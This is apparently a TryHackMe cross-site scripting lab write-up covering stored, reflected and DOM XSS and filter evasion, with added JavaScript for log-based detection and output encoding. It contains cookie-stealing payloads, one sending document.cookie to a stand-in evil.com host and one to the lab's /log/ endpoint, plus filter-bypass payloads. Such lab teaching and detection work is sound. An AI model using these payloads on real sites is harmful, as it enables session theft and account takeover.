TryHackMe: Cross-Site Scripting
Cross-Site Scripting (XSS)
XSS is a vulnerability, typically found in web applications, in which unsanitized user input (HTML tags, JavaScript, VBScript, Flash or CSS) is rendered as part of the page and executed by other users' browsers.
Stored / Persistent XSS
Stored / Persistent XSS is the most dangerous type of XSS: the malicious code originates from the website's database, so it is served to every visitor who loads the affected page.
#1 Add a comment and see if you can insert some of your own HTML.
<a href="www.google.com"> Click on this link </a>
#2 Add a comment using JavaScript to create an alert popup box that shows your document cookies.
<script>alert(document.cookie)</script>
#3 Change "XSS Playground" to "I am a hacker" by adding comments and using JavaScript.
Now that we know the web application runs our JavaScript, we can use JavaScript to change "XSS Playground" to "I am a hacker".
- To do this, we need to find the HTML element that holds the title "XSS Playground".
- Open your "Web Console" → Click on "Inspector" → Click on the "XSS Playground" text in the browser.
- Under "Inspector", you should see a highlighted section → Search for "XSS Playground" → You should see that "XSS Playground" sits inside <span id="thm-title">.
- Go to the "Web Console" → Click on "Console" → Run this JavaScript: document.querySelector('#thm-title').textContent = "I am a hacker".
- The JavaScript works in the console → Now, go to the comment section and post the same code wrapped in a script tag:
<script> document.querySelector('#thm-title').textContent = 'I am a hacker' </script>

#4 Steal the victim's cookie by having the victim's browser parse the malicious JavaScript code.
Typically, to steal someone's cookies, you inject JavaScript into the webpage so that every time someone visits it, the script reads the victim's cookies and sends their value to your server. For example,
document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')
In this case, TryHackMe has made things easier for us by providing a "logs page" that records whatever is appended to the "/log/" URL.
For example, requesting /log/hello will log "hello" for us.
This means that if we post the JavaScript code below, every visitor's cookies will be logged there.
<script>document.location='http://10.10.88.170/log/'+document.cookie</script>
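Added here as an example (not code from the TryHackMe room or this write-up): a small detector run over constructed web-server access-log lines that flags the exfiltration pattern above, i.e. requests to the /log/ endpoint whose path carries cookie name=value pairs, plus URLs containing script tags or inline event handlers. The /log/ path and the 10.10.88.170 host come from the write-up; the cookie names, client IPs, timestamps and the scanAccessLog() / SAMPLE_LOG names are my own.

```javascript
// Combined-log-format line: ip ident user [time] "METHOD url PROTO" status size "referer" ...
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"/;

// Text after /log/ that looks like "name=value; name2=value2" is a
// document.cookie string delivered via document.location, as in the payload.
const COOKIE_PAIRS_RE = /^[\w.\-]+=[^;]*(;\s*[\w.\-]+=[^;]*)*$/;
// Script tags, javascript: URLs or inline handlers (preceded by whitespace or
// a quote, e.g. `" onerror=`) in a URL are reflected/DOM XSS probes.
const XSS_PROBE_RE = /<\s*script|[\s"']on\w+\s*=|javascript:/i;

// Percent-decode, but keep the raw text if the encoding is malformed.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (_) { return s; }
}

// Returns one finding per suspicious request; the Referer tells the responder
// which page carried the stored payload.
function scanAccessLog(text) {
  const findings = [];
  for (const line of text.split('\n')) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, ip, , rawUrl, , referer] = m;
    const url = safeDecode(rawUrl);
    if (url.startsWith('/log/') && COOKIE_PAIRS_RE.test(url.slice('/log/'.length))) {
      findings.push({ ip, url, referer, reason: 'cookie-exfil' });
    } else if (XSS_PROBE_RE.test(url)) {
      findings.push({ ip, url, referer, reason: 'xss-probe' });
    }
  }
  return findings;
}

// Constructed sample: a benign search, an exfiltrated cookie jar (the browser
// percent-encodes the space and colon from document.cookie), a reflected
// probe, and the harmless /log/hello request from the write-up.
const SAMPLE_LOG = [
  '10.10.1.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dom?search=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.10.1.9 - - [01/Jan/2024:10:00:07 +0000] "GET /log/connect.sid=s%3AabcDEF123;%20theme=dark HTTP/1.1" 200 0 "http://10.10.88.170/stored" "Mozilla/5.0"',
  '10.10.1.9 - - [01/Jan/2024:10:00:09 +0000] "GET /reflected?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
  '10.10.1.2 - - [01/Jan/2024:10:00:12 +0000] "GET /log/hello HTTP/1.1" 200 0 "-" "curl/8.0"',
].join('\n');

console.log(scanAccessLog(SAMPLE_LOG));
```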

#5 Post a comment as Jack.

Reflected XSS
For reflected XSS to work, the attacker needs to trick the victim into clicking the URL that the attacker crafted.
#1 Craft a reflected XSS payload that will cause a popup saying “Hello”.
<script>alert("Hello")</script>

#2 Craft a reflected XSS payload that will cause a popup with your machine's IP address.
<script>alert(window.location.hostname)</script>

DOM XSS
For DOM XSS, an attacker's payload is not executed until the website's legitimate JavaScript code runs and writes it into the page. For example,
With Reflected XSS, the malicious payload is injected directly into the HTML response and executes as the page is parsed:
<html>
You searched for <em><script>...</script></em>
</html>
With DOM-Based XSS, the malicious payload only executes when the vulnerable JavaScript code is called or interacted with:
var keyword = document.querySelector('#search')
keyword.innerHTML = '<script>...</script>'
#1 Look at the deployed machine's DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
- Type "asasas" into the search box.
- Go to your "Web Console" → Click on the "Network" section → Search for "asasas" and find its associated request.
- You can see that the search is handled by the http://10.10.234.78/dom page.
- Now, click on the "Debugger" section → Search for the /dom page → Look for the script associated with "Image not found..".
- You can see that the script builds an <img src=...> tag from the search input:
imgEl.innerHTML = '<img src="' + imgURL + '" alt="Image not found.." width=400>'
Because the input is concatenated straight into the src attribute, a double quote closes the attribute and whatever follows becomes a new attribute. Either payload works:
test" onmouseover="alert(document.cookie)"
or
test" onerror="alert(document.cookie)"
#2 Create an onhover event on an image tag that changes the background color of the website to red.
test" onmouseover="document.body.style.backgroundColor = 'red'"
Filter Evasion
A WAF (Web Application Firewall) can filter out malicious XSS payloads, so it is useful for us to know some bypasses for the common filtering a WAF performs, for example on
<script>, alert() and similar tokens.
#1 Bypass the filter that removes any script tags.
<img src="x" onerror="alert('Hello')">
#2 The word alert is filtered, bypass it.
<img src="x" onerror="prompt('Hello')">
#3 The word hello is filtered, bypass it.
This can be done by playing a trick on the filter. Since the word 'Hello' is removed only once rather than repeatedly, submitting 'HHelloello' has the inner 'Hello' stripped out, and the remaining characters re-form 'Hello' in the response.
<img src="x" onerror="alert('HHelloello')">
#4 Challenge 4 filters the following:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
Since the filter only matches the lowercase 'onerror', we can use 'ONERROR' instead.
<img src="x" ONERROR="alert('HHelloello')">
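Added here as an example, serving both the DOM XSS sink above and this filter-evasion section (not code from the TryHackMe room or this write-up): naiveFilter() is my reconstruction of a single-pass, case-sensitive blocklist that behaves the way the challenges were observed to, escapeHtml() is the output encoding that makes the `imgEl.innerHTML` sink safe regardless of which words the input contains, and attributeNames() is a simplified attribute tokenizer used to show which attributes a browser would actually create from each version of the markup. All function names and the BLOCKLIST contents are my own assumptions.

```javascript
// Subset of the words challenge 4 filters, as listed in the write-up.
const BLOCKLIST = ['Hello', 'script', 'onerror', 'onmouseover', 'onload'];

// Removes each blocked word once, case-sensitively: the behaviour observed
// in the write-up (HHelloello -> Hello, ONERROR slips through untouched).
function naiveFilter(input) {
  let out = input;
  for (const word of BLOCKLIST) out = out.replace(word, '');
  return out;
}

// Output encoding for HTML text and quoted-attribute context: the input can
// no longer close the attribute or open a tag, so no word list is needed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// The sink from the DOM XSS section: imgURL concatenated straight into markup.
function buildImgUnsafe(imgURL) {
  return '<img src="' + imgURL + '" alt="Image not found.." width=400>';
}

// Same markup with the attribute value encoded before concatenation.
function buildImgSafe(imgURL) {
  return '<img src="' + escapeHtml(imgURL) + '" alt="Image not found.." width=400>';
}

// Simplified HTML attribute tokenizer (double-quoted, single-quoted or bare
// values) returning the attribute names a parser would see in one tag.
function attributeNames(tag) {
  const body = tag.replace(/^<\w+/, '').replace(/\/?>$/, '');
  const re = /([^\s=<>"'\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1]);
  return names;
}

// True when the injected text escaped the src value and became an on* attribute.
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => /^on/i.test(n));
}

const payload = 'test" onerror="alert(document.cookie)"';
console.log(attributeNames(buildImgUnsafe(payload)), attributeNames(buildImgSafe(payload)));
```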
NOTE:
OWASP has also published a cheat sheet on evading XSS filters:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet